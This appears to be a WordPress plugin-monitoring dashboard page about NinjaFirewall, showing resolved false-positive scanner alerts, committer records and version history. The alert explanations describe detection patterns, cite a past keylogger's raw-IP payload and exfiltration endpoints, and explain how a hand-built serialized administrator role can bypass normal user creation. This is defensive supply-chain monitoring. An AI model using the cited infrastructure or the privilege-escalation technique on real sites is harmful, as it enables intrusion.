WP Beacon

NinjaFirewall (WP Edition) – Advanced Security Plugin and Firewall

ninjafirewall · by nintechnet · wordpress.org ↗ · SVN ↗
Active installs
100k+
Current version
4.8.5
Added
2013-03-30
Last updated
2026-04-02 (1mo ago)
First seen by beacon
11d ago
Total downloads
3,195,878

Alerts (0)

No open alerts.

Show 3 resolved alerts
Critical code_pattern Resolved · false_positive_legit_ip_use 2026-04-30 15:25:27 (2d ago)
Slugninjafirewall
Patternhardcoded_ip_url
Kindbuiltin
Version4.8.5
Hit count1
First hit
File
lib/help.php
Line
250
Snippet
<p><strong>' . __('Block HTTP requests with an IP in the <code>HTTP_HOST</code> header', 'ninjafirewall'). '</strong><br />' . sprintf( __('This option will reject any request using an IP instead of
Explanationplugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) — legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths.
View raw JSON
{
    "slug": "ninjafirewall",
    "pattern": "hardcoded_ip_url",
    "kind": "builtin",
    "version": "4.8.5",
    "hit_count": 1,
    "first_hit": {
        "file": "lib/help.php",
        "line": 250,
        "snippet": "<p><strong>' . __('Block HTTP requests with an IP in the <code>HTTP_HOST</code> header', 'ninjafirewall'). '</strong><br />' . sprintf( __('This option will reject any request using an IP instead of"
    },
    "explanation": "plugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) \u2014 legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths."
}
Critical code_pattern Resolved · false_positive_defensive_string_check 2026-04-30 15:25:27 (2d ago)
Slugninjafirewall
Patternserialized_admin_role
Kindbuiltin
Version4.8.5
Hit count1
First hit
File
lib/utils.php
Line
1,319
Snippet
if ( strpos( $value, 's:13:"administrator"') === FALSE &&
Explanationplugin source contains `s:13:"administrator"` — the PHP-serialized representation of the `administrator` role meta value. Used to bypass `wp_insert_user()` by writing directly to `wp_usermeta` with a hand-crafted capabilities string. Near-zero FP because legit code uses `WP_User::set_role()` instead of building the serialized form by hand.
View raw JSON
{
    "slug": "ninjafirewall",
    "pattern": "serialized_admin_role",
    "kind": "builtin",
    "version": "4.8.5",
    "hit_count": 1,
    "first_hit": {
        "file": "lib/utils.php",
        "line": 1319,
        "snippet": "if ( strpos( $value, 's:13:\"administrator\"') === FALSE &&"
    },
    "explanation": "plugin source contains `s:13:\"administrator\"` \u2014 the PHP-serialized representation of the `administrator` role meta value. Used to bypass `wp_insert_user()` by writing directly to `wp_usermeta` with a hand-crafted capabilities string. Near-zero FP because legit code uses `WP_User::set_role()` instead of building the serialized form by hand."
}
Critical code_scan_delta Resolved · false_positive_cdn_known_good 2026-04-30 06:32:50 (2d ago)
Slugninjafirewall
Previous version4.8.5
Current version4.8.5
New findings
PatternKindFileLineSnippetConfidence
hardcoded_ip_urlbuiltinlib/help.php250<p><strong>' . __('Block HTTP requests with an IP in the <code>HTTP_HOST</code> header', 'ninjafirewall'). '</strong><br />' . sprintf( __('This option will reject any request using an IP instead ofhigh
serialized_admin_rolebuiltinlib/utils.php1,319if ( strpos( $value, 's:13:"administrator"') === FALSE &&high
New finding count2
View raw JSON
{
    "slug": "ninjafirewall",
    "previous_version": "4.8.5",
    "current_version": "4.8.5",
    "new_findings": [
        {
            "pattern": "hardcoded_ip_url",
            "kind": "builtin",
            "file": "lib/help.php",
            "line": 250,
            "snippet": "<p><strong>' . __('Block HTTP requests with an IP in the <code>HTTP_HOST</code> header', 'ninjafirewall'). '</strong><br />' . sprintf( __('This option will reject any request using an IP instead of",
            "confidence": "high"
        },
        {
            "pattern": "serialized_admin_role",
            "kind": "builtin",
            "file": "lib/utils.php",
            "line": 1319,
            "snippet": "if ( strpos( $value, 's:13:\"administrator\"') === FALSE &&",
            "confidence": "high"
        }
    ],
    "new_finding_count": 2
}

SVN committers (1)

Accounts with actual commit access to ninjafirewall on plugins.svn.wordpress.org, reconstructed from svn log. This is the list that matters for ownership changes — not the readme contributors.

Committer Member since Commits First commit Latest commit
nintechnet 2013-02-14 200 2015-12-14 · r1307629 2026-04-02 · r3497353

Readme contributors (2)

Names the plugin's readme declares as contributors. A soft signal — anyone can be listed. The SVN access column is the ground-truth cross-reference: does this contributor actually commit code?

Contributor Member since SVN access Status
nintechnet 2013-02-14 200 commits Active
bruandet 2014-10-08 Active

Versions (26 most recent)

Version Released Download
4.8.5 2026-04-02 · 1mo ago zip
4.8.4 2026-03-12 · 1mo ago zip
4.8.3 2026-01-18 · 3mo ago zip
4.8.2 2025-12-02 · 5mo ago zip
4.8.1 2025-10-25 · 6mo ago zip
4.8 2025-09-25 · 7mo ago zip
4.7.5 2025-06-13 · 10mo ago zip
4.7.4 2025-05-03 · 12mo ago zip
4.7.3 2025-04-11 · 1y ago zip
4.7.2 2025-03-30 · 1y ago zip
4.7.1 2024-11-27 · 1y ago zip
4.7 2024-11-11 · 1y ago zip
4.6.1 2024-11-03 · 1y ago zip
4.6 2024-08-12 · 1y ago zip
4.5.11 2024-07-07 · 1y ago zip
4.5.10 2023-10-31 · 2y ago zip
4.5.9 2023-10-25 · 2y ago zip
4.5.8 2023-07-24 · 2y ago zip
4.5.7 2023-04-13 · 3y ago zip
4.5.6 2023-02-17 · 3y ago zip
4.5.5 2022-11-26 · 3y ago zip
4.5.4 2022-10-26 · 3y ago zip
4.5.3 2022-09-07 · 3y ago zip
4.5.2 2022-06-09 · 3y ago zip
4.5.1 2022-05-09 · 3y ago zip
4.5 2022-02-04 · 4y ago zip